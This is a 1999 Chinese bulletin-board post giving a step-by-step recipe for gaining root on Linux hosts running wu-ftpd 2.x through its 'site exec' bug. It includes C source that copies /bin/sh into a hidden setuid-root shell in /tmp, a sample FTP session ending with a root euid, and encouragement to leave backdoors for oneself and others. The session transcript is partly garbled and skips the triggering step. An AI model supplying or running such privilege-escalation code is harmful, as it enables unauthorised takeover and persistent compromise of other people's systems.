帮你在liunx上取得root权限(局限于wu-ftp 2.x).txt

当今

发信人: triton (半颗勇敢的心), 信区: Security 
标  题: 帮你在liunx上取得root权限(局限于wu-ftp 2.x) (转载) 
发信站: 武汉白云黄鹤站 (Fri Feb 26 09:22:09 1999) , 站内信件 
  
【 以下文字转载自 Encrypt 讨论区 】 
【 原文由 just 所发表 】 
如何使用 wu-ftp 2.x (site exec bug) 来取得 root 权限 
1.需求: 
(1)该主机的 ftpd 使用 wu-ftp 2.x 版本 
(2)您必须有该主机的任何一个帐号 
2.步骤: 
(1)先 telnet login 到主机您的目录下... 
(2)使用 cc -o bug bug.c 将下列程式编译... 
   --< bug.c >----------------------------- 
  
     #include 
     #include 
     #include 
  
  
  
  
  
  
  
     main() 
  
     { 
  
          seteuid(0); 
  
          system("cp /bin/sh /tmp/.sh"); 
  
          system("chmod 6777 /tmp/.sh"); 
  
     } 
  
  
  
   ----------------------------------------- 
  
   编译成功後会在您的目录下产生 bug 这个档案 (别忘了 chmod ...) 
  
(3)使用 ftp login 到该主机下... 
  220 hackerforce FTP server (Version wu-2.4(1) Sun Jul 31 21:00:15 CDT 1997) r 
  
dy. 
  
  Name (hackerforce:ftp): funky 
  
  $ /tmp/.sh 
  
  
  
  # id 
  
  uid=101(funky) gid=50(user) euid=0(root) 
  
  # 
  
  
  
  恭喜您...到此您就成功的拿到 root 权限了.... 
3.后记 
由于wu-ftpd 执行时的 euid 是 root ,所以我们透过这个 hole 来执行执行外部的命戈 
... 

  当编译完的 bug 一但被执行,便会帮您将 /bin/sh 这个 shell 复制一份到 /tmp/.sh 
  
并且 
  
  会将 /tmp/.sh setuid ,一但成功後只要任何使用者执行 /tmp/.sh 这个 setuid shell 
  
N会雍 
  
  有 root 的 euid .... 
  一但您得手,别忘了帮自己及别人多留些 backdoor... ;-) 
弟有感于这些 hack 资源实在很有限,以後弟会试着将一些弟曾实作过的技巧及心得 
list 出      来,让有兴趣的朋友能很快的进入这个领域,欢迎各位前辈後进,能多多与弟 
研究,交流.. 
呵呵! 
chat* happy new year.welcome !!!. 
  
--